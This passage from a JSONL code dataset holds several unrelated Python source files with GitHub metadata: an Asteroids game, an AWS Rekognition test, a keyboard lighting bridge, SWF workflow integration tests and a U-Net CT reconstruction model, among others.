print(\"New Balance: \", fd.balance)\r\n else:\r\n print(\"Insufficient Balance\")\r\n else:\r\n print(\"Invalid Input\")\r\n\r\n fd.display_fd()\r\n fd.cal_fd()\r\n\r\nelif selection == 3:\r\n loan_amt = int(input(\"Enter Ur Loan Amount: \"))\r\n ln = Loan(loan_amt)\r\n\r\n ln.display_loan()\r\n ln.cal_loan()\r\n","repo_name":"Rachit304/Python-Practice-Programs","sub_path":"Lab8.py","file_name":"Lab8.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30170917361","text":"from math import pi, cos, sin, sqrt\nfrom random import randint\nfrom Astroid import Astroid\nfrom Projectile import Projectile\nfrom highscoreLogger import Logger\nimport pickle\n\nclass Game:\n def __init__(self):\n self.logger = Logger()\n\n self.state = 0\n #State 0: Menu\n #State 1: Game\n #State 2: Pause\n #State 3: Highscore input\n\n #Game flags\n self.incoming_astroids = False\n\n #Player/ship variables\n self.ro = 0\n self.x = 400\n self.y = 300\n self.points = 0\n self.shield = 3\n self.stage = 0\n self.vel = [0.0, 0.0]\n self.dead = False\n self.thrust_counter = 0\n self.thrust = False\n\n #Astroid and projectile list\n self.astr = []\n self.pjct = []\n\n #game fase handeling variables\n self.counter = 0\n self.pause_counter = 0\n\n #Highscore definitions\n self.scores = self.get_highscores()[:10]\n self.localScores = self.get_local_highscores()[:5]\n\n def tick(self, pg, pressed):\n if self.state == 1:\n\n #stage\n if len(self.astr) == 0 and not self.dead:\n self.pause_counter += 1\n self.incoming_astroids = True\n self.pjct = []\n if self.pause_counter >= 80:\n self.pause_counter = 0\n self.incoming_astroids = False\n self.newStage()\n\n #check_if_dead\n if self.dead:\n self.death_init()\n\n #ship_direction_calc\n dir = mapFromTo(self.ro, 0, 360, 0.0, 2 * pi)\n\n #controls\n if (pressed[pg.K_w] or pressed[pg.K_UP]) and vec_length(self.vel) < 8:\n self.vel[0] += cos(dir) * 0.2\n self.vel[1] += sin(dir) * 0.2\n self.thrust = True\n else:\n self.thrust = False\n if pressed[pg.K_a] or pressed[pg.K_LEFT]:\n self.ro -= 5\n if pressed[pg.K_d] or pressed[pg.K_RIGHT]:\n self.ro += 5\n self.counter += 1\n if pressed[pg.K_SPACE] and self.counter >= 25 and len(self.astr) != 0:\n self.counter = 0\n self.shoot()\n\n #ship_movement_de-acc\n self.vel[0] *= 0.985\n self.vel[1] *= 0.985\n\n #movement_execution\n self.x += self.vel[0]\n self.y += self.vel[1]\n for i in self.astr:\n i.move()\n for i in self.pjct:\n i.move()\n\n #looping\n ##player\n if self.x < 0:\n self.x = float(800)\n elif self.x > 800:\n self.x = float(0)\n if self.y < 0:\n self.y = float(600)\n elif self.y > 600:\n self.y = float(0)\n\n ##Astroids\n for astr in self.astr:\n astrLBx = float(- astr.size * 10)\n astrUBx = float(800 + astr.size * 10)\n astrLBy = float(- astr.size * 10)\n astrUBy = float(600 + astr.size * 10)\n if astr.x < astrLBx:\n astr.x = astrUBx\n elif astr.x > astrUBx:\n astr.x = astrLBx\n if astr.y < astrLBy:\n astr.y = astrUBy\n elif astr.y > astrUBy:\n astr.y = astrLBy\n\n ##projectiles\n for pjct in self.pjct:\n if pjct.x < 0:\n pjct.x = float(800)\n elif pjct.x > 800:\n pjct.x = float(0)\n if pjct.y < 0:\n pjct.y = float(600)\n elif pjct.y > 600:\n pjct.y = float(0)\n\n #delete_projectieles\n plist = []\n for pjct in self.pjct:\n if vec_length(pjct.vel) < 0.4:\n plist.append(pjct)\n for i in range(len(plist)):\n del plist[i]\n del self.pjct[i]\n\n #collision\n if len(self.astr) * len(self.pjct) > 0:\n self.points += self.hit(self.pjct, self.astr)\n if self.collision():\n self.ship_hit()\n\n\n def newStage(self):\n self.stage += 1\n newAstr = int(self.stage * 1.5 + 4)\n for i in range(newAstr):\n side = i % 4\n if side == 0:\n self.astr.append(Astroid(50, 50 + randint(0, 700), 3))\n if side == 1:\n self.astr.append(Astroid(50 + randint(0, 500), 50, 3))\n if side == 2:\n self.astr.append(Astroid(750, 50 + randint(0, 700), 3))\n if side == 3:\n self.astr.append(Astroid(50 + randint(0, 500), 550, 3))\n\n def ship_hit(self):\n self.shield -= 1\n if self.shield > 0:\n self.death_init()\n else:\n self.highscore_input()\n\n def hit(self, pjct, astr):\n points = 0\n plist = []\n alist = []\n for i,p in enumerate(pjct):\n for j,a in enumerate(astr):\n if dist(p.x, a.x, p.y, a.y) < a.size * 10 + 1:\n plist.append(i)\n split_a = a.split()\n if split_a is not None:\n astr.append(split_a)\n points += 100 * (split_a.size + 1)\n else:\n alist.append(j)\n points += 100\n\n for i in uniq(plist)[::-1]:\n del self.pjct[i]\n\n for i in uniq(alist)[::-1]:\n del self.astr[i]\n\n return points\n \n def collision(self):\n hit = False\n for i in range(len(self.astr)):\n di = dist(self.x, self.astr[i].x, self.y, self.astr[i].y)\n if di < 4 + self.astr[i].size * 10:\n hit = True\n return hit\n \n def shoot(self):\n dir = mapFromTo(self.ro, 0, 360, 0.0, 2 * pi)\n vel = [cos(dir) * 8, sin(dir) * 8]\n self.pjct.append(Projectile(self.x + cos(dir) * 8, self.y + sin(dir) * 8, vel))\n\n def Ship_pointlist(self):\n lst = [[8, 135], [8, 225], [8, 0]]\n ship_point_list = []\n for i in range(3):\n dir = mapFromTo(self.ro + lst[i][1], 0, 360, 0.0, 2 * pi)\n P = [self.x + cos(dir) * lst[i][0], self.y + sin(dir) * lst[i][0]]\n ship_point_list.append(P)\n return ship_point_list\n\n def Ship_thrust_pointlist(self):\n lst = [[6, 160], [10, 180], [6, 200]]\n ship_thrust_point_list = []\n for i in range(3):\n dir = mapFromTo(self.ro + lst[i][1], 0, 360, 0.0, 2 * pi)\n P = [self.x + cos(dir) * lst[i][0], self.y + sin(dir) * lst[i][0]]\n ship_thrust_point_list.append(P)\n return ship_thrust_point_list\n\n def death_init(self):\n self.pause_counter += 1\n if not self.dead:\n self.x = 400\n self.y = 300\n self.ro = 0\n self.vel = [0.0, 0.0]\n self.dead = True\n self.pjct = []\n self.temp_astr = self.astr.copy()\n self.astr = []\n\n elif self.pause_counter >= 80:\n self.pause_counter = 0\n self.dead = False\n for i in range(len(self.temp_astr)):\n side = i % 4\n if side == 0:\n self.temp_astr[i].x, self.temp_astr[i].y = (50, 50 + randint(0, 700))\n if side == 1:\n self.temp_astr[i].x, self.temp_astr[i].y = (50 + randint(0, 500), 50)\n if side == 2:\n self.temp_astr[i].x, self.temp_astr[i].y = (750, 50 + randint(0, 700))\n if side == 3:\n self.temp_astr[i].x, self.temp_astr[i].y = (50 + randint(0, 500), 550)\n self.astr = self.temp_astr.copy()\n\n\n def reload(self, state=0):\n self.state = state\n self.ro = 0\n self.x = 400\n self.y = 300\n self.points = 0\n self.shield = 3\n self.stage = 0\n self.vel = [0.0, 0.0]\n self.astr = []\n self.pjct = []\n self.counter = 0\n self.scores = self.get_highscores()[:10]\n self.localScores = self.get_local_highscores()[:5]\n\n def save_highscore(self, name):\n #Pickle database\n\n try:\n with open('highscore.txt', 'rb') as f:\n scores = pickle.load(f) #score = {'Name':'','Score':0,'Stage':0} layout of stored indexes\n except:\n print('No Scorefile, creating score file')\n score = {'Name': '', 'Score': 0, 'Stage': 0}\n scores = []\n for i in range(5):\n scores.append(score)\n with open('highscore.txt', 'wb') as f:\n pickle.dump(scores, f)\n for i in range(len(scores)):\n if self.points > scores[i]['Score']:\n newHigh = {'Name': str(name), 'Score': self.points, 'Stage': self.stage}\n scores.insert(i, newHigh)\n break\n scores = scores[:5]\n self.localScores = scores[:5]\n with open('highscore.txt', 'wb') as f:\n print('saving scorefile')\n pickle.dump(scores, f)\n\n\n #online database\n if self.points > 0:\n self.logger.post_score('Astroid', self.points, str(name), self.stage)\n\n scores = []\n try:\n for s in self.logger.get_scores('Astroid'):\n scores.append({'Name': s['Opt1'], 'Score': s['Score'], 'Stage': s['Opt2']})\n scores = sorted(scores, key=lambda scores: scores['Score'], reverse=True)\n except:\n print('server database error')\n\n self.reload()\n\n def get_highscores(self):\n scores = []\n try:\n for s in self.logger.get_scores('Astroid'):\n scores.append({'Name': s['Opt1'], 'Score': s['Score'], 'Stage': s['Opt2']})\n return sorted(scores, key=lambda scores: scores['Score'], reverse=True)\n except:\n print('server database error')\n return []\n\n def get_local_highscores(self):\n try:\n with open('highscore.txt', 'rb') as f:\n scores = pickle.load(f) #score = {'name':'','score':0,'stage':0}\n except:\n print('No Scorefile, creating score file')\n score = {'Name': '', 'Score': 0, 'Stage': 0}\n scores = []\n for i in range(5):\n scores.append(score)\n with open('highscore.txt', 'wb') as f:\n pickle.dump(scores, f)\n return scores\n\n def start_game(self):\n if self.state == 0:\n self.state = 1\n self.reload(1)\n\n def end_game(self):\n if self.state > 0:\n self.state = 0\n\n def toggle_pause(self):\n if self.state == 1:\n self.state = 2\n self.scores = self.get_highscores()[:10]\n elif self.state == 2:\n self.state = 1\n\n def highscore_input(self):\n if self.state == 1:\n self.state = 3\n\n\n\ndef mapFromTo(x, a, b, c, d):\n y = (x - a) / (b - a) * (d - c) + c\n return y\n\n\ndef dist(x1, x2, y1, y2):\n d = sqrt(((x1 - x2)**2) + ((y1 - y2)**2))\n return d\n\n\ndef vec_length(vec):\n lenght = sqrt(vec[0]**2 + vec[1]**2)\n return lenght\n\n\ndef uniq(lst):\n seen = set()\n uniq = []\n for x in lst:\n if x not in seen:\n uniq.append(x)\n seen.add(x)\n uniq.sort()\n return uniq","repo_name":"jonas8217/Astroid","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":11567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72737430225","text":"import unittest\nfrom unittest.mock import patch\n\nimport rekognition\n\n\nclass TestRekognition(unittest.TestCase):\n @patch(\"rekognition.boto3\")\n def test_detect_faces_succeeded(self, m_boto3):\n aws_response = {\n \"FaceDetails\": [\n {\n \"BoundingBox\": {\n \"Height\": 0.18000000715255737,\n \"Left\": 0.5555555820465088,\n \"Top\": 0.33666667342185974,\n \"Width\": 0.23999999463558197,\n },\n \"Confidence\": 100,\n \"Smile\": {\"Value\": True, \"Confidence\": 100},\n \"Eyeglasses\": {\"Value\": True, \"Confidence\": 100},\n }\n ],\n \"ResponseMetadata\": {\"HTTPStatusCode\": 200},\n }\n m_boto3.client.return_value.detect_faces.return_value = aws_response\n response = rekognition.faces_in_s3object(\"selfies\", \"face.jpg\")\n\n self.assertIsNotNone(response)\n self.assertIsInstance(response, list)\n self.assertIsInstance(response[0], dict)\n\n @patch(\"rekognition.boto3\")\n def test_detect_faces_failed(self, m_boto3):\n aws_response = {\n \"FaceDetails\": [],\n \"ResponseMetadata\": {\"HTTPStatusCode\": 200},\n }\n m_boto3.client.return_value.detect_faces.return_value = aws_response\n response = rekognition.faces_in_s3object(\"selfies\", \"face.jpg\")\n\n self.assertIsNotNone(response)\n self.assertIsInstance(response, list)\n self.assertEqual(len(response), 0)\n","repo_name":"noverde/serpens","sub_path":"tests/test_rekognition.py","file_name":"test_rekognition.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40812495554","text":"#!/usr/bin/python3\n\nimport hid\nimport sacn\nimport layout\nimport time\nimport queue\nimport threading\nimport platform\n\nRK84_VID = 0x258a\nRK84_PID = 0xc8\nIP = \"127.0.0.84\"\n\nreceiver = sacn.sACNreceiver(IP)\nrk84 = hid.enumerate(RK84_VID, RK84_PID)\nh = hid.device()\npackets_queue = queue.Queue()\npacket_sender_stop_event = threading.Event()\nlast_packets: list[bytes] = []\n\n@receiver.listen_on('universe', universe=1)\ndef sacn_callback(packet: sacn.DataPacket):\n global last_packets\n \n dmx_data = packet.dmxData\n colors = []\n\n for i in range(0, min(16*6*3, len(dmx_data)), 3):\n colors.append((dmx_data[i], dmx_data[i+1], dmx_data[i+2]))\n\n colors_dict = layout.colors_list_to_keys_dict(colors)\n packets = layout.colors_dict_to_usb_packets(colors_dict)\n\n # print(\"sending packets:\")\n for packet in packets:\n packets_queue.put(packet)\n\n last_packets = packets\n\ndef usb_packet_sender():\n while not packet_sender_stop_event.is_set():\n try:\n packet = packets_queue.get(block=True, timeout=1)\n # print(packet.hex(\" \"))\n h.send_feature_report(packet)\n except queue.Empty:\n if packet_sender_stop_event.is_set():\n break\n else:\n # resend last packets\n for packet in last_packets:\n h.send_feature_report(packet)\n\nif __name__ == \"__main__\":\n rk_path = None\n if platform.system() == \"Windows\":\n for interface in rk84:\n # pprint.pprint(interface)\n if interface['usage_page'] == 65280:\n rk_path = interface['path']\n # break\n elif platform.system() == \"Linux\":\n if len(rk84) >=2:\n rk_path = rk84[1]['path']\n\n if rk_path is None:\n print(\"RK84N not found\")\n exit(1)\n\n h.open_path(rk_path)\n h.set_nonblocking(1)\n\n packet_sender_thread = threading.Thread(target=usb_packet_sender, daemon=True)\n packet_sender_thread.start()\n\n receiver.start()\n\n print(f\"sACN listening on {IP}\")\n\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n print(\"Exiting...\")\n receiver.stop()\n packet_sender_stop_event.set()","repo_name":"kawaiiDango/rk84n-sacn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"26469410173","text":"\"\"\" Defines all of the window elements, as well as tying everything together into one\napp. \"\"\"\n\n# I seriously need to figure out what the hell I'm doing with the imports.\n\nimport wx\nimport PreviewRenderer\nfrom SaveLoad import *\n\nclass PygameDisplay(wx.Window):\n \"\"\" Taken from a pygame.org entry by David Barker \n Still learning what's what.\"\"\"\n def __init__(self, parent, ID):\n wx.Window.__init__(self, parent, ID)\n self.parent = parent\n self.hwnd = self.GetHandle()\n \n self.size = self.GetSizeTuple()\n self.size_dirty = True\n \n self.timer = wx.Timer(self)\n self.Bind(wx.EVT_PAINT, self.OnPaint)\n self.Bind(wx.EVT_TIMER, self.Update, self.timer)\n self.Bind(wx.EVT_SIZE, self.OnSize)\n \n self.fps = 60.0\n self.timespacing = 1000.0 / self.fps\n self.timer.Start(self.timespacing, False)\n \n \n \n def Update(self, event):\n # Any update tasks would go here (moving sprites, advancing animation frames etc.)\n self.Redraw()\n \n def Redraw(self):\n \n \n s = pygame.image.tostring(self.screen, 'RGBA') # Convert the surface to an RGB string\n img = wx.ImageFromData(self.size[0], self.size[1], s) # Load this string into a wx image\n bmp = wx.BitmapFromImage(img) # Get the image in bitmap form\n dc = wx.ClientDC(self) # Device context for drawing the bitmap\n dc.DrawBitmap(bmp, 0, 0, False) # Blit the bitmap image to the display\n del dc\n \n def OnPaint(self, event):\n self.Redraw()\n event.Skip() # Make sure the parent frame gets told to redraw as well\n \n def OnSize(self, event):\n # Need to figure out a way to make this a static size.\n # That way I can keep the previewer embedded into it's own frame.\n self.size = self.GetSizeTuple()\n self.size_dirty = True\n \n def Kill(self, event):\n # Make sure Pygame can't be asked to redraw /before/ quitting by unbinding all methods which\n # call the Redraw() method\n # (Otherwise wx seems to call Draw between quitting Pygame and destroying the frame)\n # This may or may not be necessary now that Pygame is just drawing to surfaces\n self.Unbind(event = wx.EVT_PAINT, handler = self.OnPaint)\n self.Unbind(event = wx.EVT_TIMER, handler = self.Update, source = self.timer)\n\nclass MasterWindow(wx.Frame):\n \"\"\"The frame that contains everything!\n Nothing in it, at the moment, except for test junk.\"\"\"\n def __init__(self, parent=None, ID=-1, title='Charas+'):\n super(MasterWindow, self).__init__(parent, ID, title)\n self.Show()\n\n# Test code Down There.\n\napp = wx.App()\ntest = MasterWindow()\napp.MainLoop()","repo_name":"CodyTheRat/Charas-Plus","sub_path":"src/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"21057988366","text":"__all__ = ['decrypt_flask_request']\nfrom typing import Any\nfrom typing import Mapping\nfrom typing import Optional\n\nfrom .utils import decrypt_content\nfrom .utils import verify_signature\n\n\ndef decrypt_flask_request(\n request: Any,\n secret_key: str,\n webhook_uri: Optional[str] = None,\n signature_expiry_seconds: float = 60,\n) -> Mapping[str, Any]:\n if webhook_uri is None:\n webhook_uri = request.url\n\n verify_signature(\n webhook_uri,\n request.headers['X-FormSG-Signature'],\n signature_expiry_seconds=signature_expiry_seconds,\n )\n\n body_json: Mapping[str, Any] = request.get_json()\n\n return decrypt_content(body_json, secret_key)\n","repo_name":"fivehealth/formsg-python-sdk","sub_path":"formsg/flask.py","file_name":"flask.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"27797245364","text":"from src.rl import RL\nfrom src.enviroment import Env\nimport sys\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-l',\n default='4',\n dest='LENGTH',\n help='input the length of the grid')\n\n parser.add_argument('-i',\n default='20',\n dest='ITERATION',\n help='input the iteration of training')\n\n parser.add_argument('-d',\n default='.1',\n dest='DELAY',\n help='input delay')\n\n args = parser.parse_args()\n \n try:\n length = int(args.LENGTH)\n iteration = int(args.ITERATION)\n except ValueError:\n print('error: length or iteration must be an integer')\n sys.exit()\n\n try:\n delay = float(args.DELAY)\n except ValueError:\n print('error: delay must be an float')\n sys.exit()\n\n game = Env(length)\n rl = RL(game.get_actions())\n\n while game.episode < iteration:\n s, done = game.restart()\n a = rl.actor(s)\n while not done:\n ns, r, done = game.go(a)\n na = rl.actor(ns)\n rl.learn(s, a, r, ns, na)\n s, a = ns, na\n print(rl.q_table)\n\n","repo_name":"yutongshen/RL-SARSA-Maze","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1025318804","text":"# Created: 2023.01.05\n# Author: Vladimir Vons \n# License: GNU, see LICENSE for more details\n\n\nimport asyncio\n#\nfrom IncP import GetSysInfo\nfrom Task.Main import TTask\n\n\ndef Run():\n Info = GetSysInfo()\n PyNeed = (3, 9, 0)\n if (Info['python'] >= PyNeed):\n Task = TTask().Run()\n asyncio.run(Task)\n else:\n print(f'Need python >= {PyNeed}')\n\nif (__name__ == '__main__'):\n Run()\n","repo_name":"VladVons/py-vShops","sub_path":"src/vShops.py","file_name":"vShops.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41267689219","text":"import os\nimport json\nimport unittest\n\n\ndef read_json_file(file_path):\n with open(file_path) as file_obj:\n data = json.load(file_obj)\n return data\n\n\nclass TestReadJsonFile(unittest.TestCase):\n def setUp(self) -> None:\n print(\"Setup is called\")\n self.root_dir = os.path.abspath(os.path.dirname(__name__))\n print(self.root_dir)\n self.file_name = 'info.json'\n self.file_data = [\n {\n \"name\": \"Vikrant\",\n \"hobby\": [\"Coding\", \"Reading blogs\"]\n }\n ]\n with open(os.path.join(self.root_dir, self.file_name), mode='w') as file_obj:\n json.dump(self.file_data, file_obj, indent=2)\n\n def tearDown(self) -> None:\n print(\"Tear Down is called\")\n path = os.path.join(self.root_dir, self.file_name)\n if os.path.exists(path):\n os.remove(path)\n\n def test_read_json_file(self):\n print(\"test read_json_file\")\n response = read_json_file(file_path=os.path.join(self.root_dir, self.file_name))\n # assert response[0]['name'] == self.file_data[0]['name']\n # assert response[0]['hobby'][0] == self.file_data[0]['hobby'][0]\n # assert response[0]['hobby'][1] == self.file_data[0]['hobby'][1]\n self.assertListEqual(response, self.file_data)\n","repo_name":"Nareshwill/playground","sub_path":"scratch_8.py","file_name":"scratch_8.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11412767400","text":"import json\n\nfrom deciders.test_01 import test_01\nfrom deciders.test_02 import test_02\nfrom deciders.test_03 import test_03\nfrom deciders.test_04 import test_04\nfrom deciders.test_05 import test_05\nfrom deciders.test_06 import test_06\nfrom deciders.test_07 import test_07\nfrom deciders.test_08 import test_08\nfrom deciders.test_09 import test_09\nfrom deciders.test_10 import test_10\nfrom deciders.test_11 import test_11\nfrom deciders.test_12 import test_12\nfrom deciders.test_13 import test_13\nfrom deciders.test_14 import test_14\nfrom deciders.test_15 import test_15\nfrom deciders.test_16 import test_16\nfrom deciders.test_17 import test_17\nfrom test_helper import get_activity_result, docprint, print_result, print_details\n\nfrom activity_worker import ActivityWorkerProcess\n\nworker1 = ActivityWorkerProcess(domain='floto_test', task_list='floto_activities')\nworker2 = ActivityWorkerProcess(domain='floto_test', task_list='floto_activities')\nworker1.start()\nworker2.start()\n\n@docprint\ndef run_01():\n \"\"\"\n Test 01\n Single task with context\n\n \"\"\"\n result = test_01()\n result_activity_1 = get_activity_result(result, 'activity1', 'v5')\n print_result(result)\n assert result_activity_1['workflow'] == {'foo': 'bar'}\n assert result_activity_1['status'] == 'finished'\n\n\n@docprint\ndef run_02():\n \"\"\"Test 02\n Single task without context\n\n \"\"\"\n result = test_02()\n result_activity_2 = get_activity_result(result, 'activity2', 'v4')\n print_result(result)\n assert result_activity_2['status'] == 'finished'\n\n\n@docprint\ndef run_03():\n \"\"\"Test 03\n Two tasks without dependency, run in parallel if > 1 worker\n\n \"\"\"\n result = test_03()\n result1 = get_activity_result(result, 'activity1', 'v5')\n result2 = get_activity_result(result, 'activity2', 'v4')\n print_result(result)\n\n assert result1['workflow'] == {'foo': 'bar'}\n assert result1['status'] == 'finished'\n assert result2['status'] == 'finished'\n\n\n@docprint\ndef run_04():\n \"\"\"Test 04\n Two tasks with 1 -> 3\n\n \"\"\"\n result = test_04()\n result3 = get_activity_result(result, 'activity3', 'v2')\n print_result(result)\n\n assert result3['activity1']['status'] == 'finished'\n assert result3['activity1']['workflow'] == {'foo': 'bar'}\n assert result3['status'] == 'finished'\n\n\n@docprint\ndef run_05():\n \"\"\"Test 05\n Failing task with retry strategy, succeeds after retry\n\n \"\"\"\n result = test_05()\n result3 = get_activity_result(result, 'activity_fails_3', 'v2')\n print_result(result)\n assert result3['workflow_input'] == {'foo': 'bar'}\n assert result3['status'] == 'finished'\n\n\n@docprint\ndef run_06():\n \"\"\"Test 06\n Failing task with retry strategy, reaches limit of retries\n\n \"\"\"\n details = test_06()\n details2 = get_activity_result(details, 'activity_fails_2', 'v2')\n print_details(details)\n assert details2 == 'Something went wrong'\n\n\n@docprint\ndef run_07():\n \"\"\"Test 07\n Timeout\n\n \"\"\"\n result = test_07()\n result2 = get_activity_result(result, 'activity2', 'v4')\n print_result(result)\n assert result2['status'] == 'finished'\n\n\n@docprint\ndef run_08():\n \"\"\"Test 08\n Repeated Workflow\n\n \"\"\"\n result = test_08()\n print_result(result)\n result1 = get_activity_result(result, 'activity1', 'v5')\n assert result1['status'] == 'finished'\n\n\n@docprint\ndef run_09():\n \"\"\"Test 09\n Repeated Workflow with timer and failing activity with retries\n\n \"\"\"\n result = test_09()\n print_result(result)\n result4 = get_activity_result(result, 'activity4', 'v2')\n assert [r for r in result4.keys() if 'activity1' in r]\n assert [r for r in result4.keys() if 'activity2' in r]\n\n\n@docprint\ndef run_10():\n \"\"\"Test 10\n Testing heartbeat: Heartbeat(20s) < execution time of activity5_v2 (30s)\n \"\"\"\n\n result = test_10()\n result = get_activity_result(result, 'activity5', 'v2')\n print('Result: ' + json.dumps(result) + '\\n')\n assert result['status'] == 'finished'\n\n\n@docprint\ndef run_11():\n \"\"\"Test 11\n Decider times out, succeeds after next decision task\n Prints a warning due to Decider timeout\n \"\"\"\n\n result = test_11()\n result = get_activity_result(result, 'activity1', 'v5')\n print('Result: ' + json.dumps(result) + '\\n')\n assert result['workflow'] == {'foo': 'bar'}\n assert result['status'] == 'finished'\n\n\n@docprint\ndef run_12():\n \"\"\"Test 12\n run_09 with 2 parallel deciders\n \"\"\"\n\n result = test_12()\n result = get_activity_result(result, 'activity4', 'v2')\n print('Result: ' + json.dumps(result) + '\\n')\n assert [r for r in result.keys() if 'activity1' in r]\n assert [r for r in result.keys() if 'activity2' in r]\n\n\n@docprint\ndef run_13():\n \"\"\"Test 13\n Two parallel deciders, one of them times out\n\n \"\"\"\n result = test_13()\n print_result(result)\n result4 = get_activity_result(result, 'activity4', 'v2')\n assert [r for r in result4.keys() if 'activity1' in r]\n assert [r for r in result4.keys() if 'activity2' in r]\n\n\n@docprint\ndef run_14():\n \"\"\"Test 14\n Simple test with child workflow\n\n \"\"\"\n result = test_14()\n print_result(result)\n result_cw = get_activity_result(result, 'test_child_workflow', 'v2')\n assert [r for r in result_cw.keys() if 'activity2' in r]\n\n\n@docprint\ndef run_15():\n \"\"\"Test 15\n Workflow schedules a child workflow.\n\n \"\"\"\n result = test_15()\n print_result(result)\n result_child_workflow = get_activity_result(result, 'test_child_workflow', 'v2')\n result_activity = get_activity_result(result_child_workflow, 'activity1', 'v5')\n assert result_activity['status'] == 'finished'\n\n\n@docprint\ndef run_16():\n \"\"\"Test 16\n Failing Task in ChildWorkflow\n\n \"\"\"\n result = test_16()\n print_result(result)\n result_child_workflow = get_activity_result(result, 'test_child_workflow', 'v2')\n result_activity = get_activity_result(result_child_workflow, 'activity_fails_2', 'v2')\n assert result_activity == 'Something went wrong'\n\n@docprint\ndef run_17():\n \"\"\"Test 17\n Activity generates tasks. Tow deciders, one times out.\n \"\"\"\n result = test_17()\n print_result(result)\n result_activity_6 = get_activity_result(result, 'activity6', 'v1')\n assert set(result_activity_6) == set(['a.in', 'b.in'])\n\ntests = [run_01, run_02, run_03, run_04, run_05, run_06, run_07, run_08, run_09, run_10, run_11,\n run_12, run_13, run_14, run_15, run_16, run_17]\n\ntry:\n [t() for t in tests]\nexcept (KeyboardInterrupt, SystemExit):\n worker1.terminate()\n worker2.terminate()\n\nprint()\nprint('All workflows finished successfully.')\n\nworker1.terminate()\nworker2.terminate()\n","repo_name":"babbel/floto","sub_path":"tests/integration/test_swf.py","file_name":"test_swf.py","file_ext":"py","file_size_in_byte":6675,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"48"} +{"seq_id":"31415004697","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nfrom collections import OrderedDict\nimport sys\nimport config\nimport os\nimport torch.nn.functional as F\nimport BaseAlg\n\n\n###\n###\n### Method based on applying a U-Net denoiser on top of the FBP reconstruction\n###\n###\n\n\n###\n### UNET implementation from github.com/usuyama/pytorch-unet\n###\nclass double_conv(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(double_conv, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_ch, out_ch, 3,padding=1),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_ch, out_ch, 3,padding=1),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, x):\n x = self.conv(x)\n return x\nclass inconv(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(inconv, self).__init__()\n self.conv = double_conv(in_ch, out_ch)\n\n def forward(self, x):\n x = self.conv(x)\n return x\nclass down(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(down, self).__init__()\n self.mpconv = nn.Sequential(\n nn.MaxPool2d(2),\n double_conv(in_ch, out_ch)\n )\n\n def forward(self, x):\n x = self.mpconv(x)\n return x\nclass up(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(up, self).__init__()\n self.up = nn.ConvTranspose2d(in_ch//2, in_ch//2, 2, stride=2)\n self.conv = double_conv(in_ch, out_ch)\n\n def forward(self, x1, x2):\n x1 = self.up(x1)\n diffY = x2.size()[2] - x1.size()[2] #Won't work for 3d Images\n diffX = x2.size()[3] - x1.size()[3]\n x1 = F.pad(x1, (diffX // 2, diffX - diffX//2, diffY // 2, diffY - diffY//2))\n x = torch.cat([x2, x1], dim=1)\n x = self.conv(x)\n return x\nclass outconv(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(outconv, self).__init__()\n self.conv = nn.Conv2d(in_ch, out_ch, 1)\n\n def forward(self, x):\n x = self.conv(x)\n return x\nclass MyNet(nn.Module):\n def __init__(self, args):\n super(MyNet, self).__init__()\n self.hypers={}\n self.inc = inconv(1, 64)\n self.down1 = down(64, 128)\n self.down2 = down(128, 256)\n self.down3 = down(256, 512)\n self.down4 = down(512, 512)\n self.up1 = up(1024, 256)\n self.up2 = up(512, 128)\n self.up3 = up(256, 64)\n self.up4 = up(128, 64)\n self.outc = outconv(64, 1)\n\n def forward(self, x):\n x = config.fbp_op_mod(x)\n x1 = self.inc(x)\n x2 = self.down1(x1)\n x3 = self.down2(x2)\n x4 = self.down3(x3)\n x5 = self.down4(x4)\n x = self.up1(x5, x4)\n x = self.up2(x, x3)\n x = self.up3(x, x2)\n x = self.up4(x, x1)\n x = self.outc(x)\n return x\n\n def init_weights(self,m):\n pass\n\nclass Algorithm(BaseAlg.baseNet):\n def __init__(self,args,data_loaders,path=config.data_path+'nets/'):\n super(Algorithm, self).__init__(args,path,MyNet(args),data_loaders)\n","repo_name":"Zakobian/CT_framework_","sub_path":"Algorithms/FBP+U.py","file_name":"FBP+U.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"36001040502","text":"import math\n\nwhile True:\n flag = True\n l = input().split(\" \")\n if len(l) == 2:\n m, n = map(int, l)\n for num in range(m, n+1):\n a, b, c = map(int, 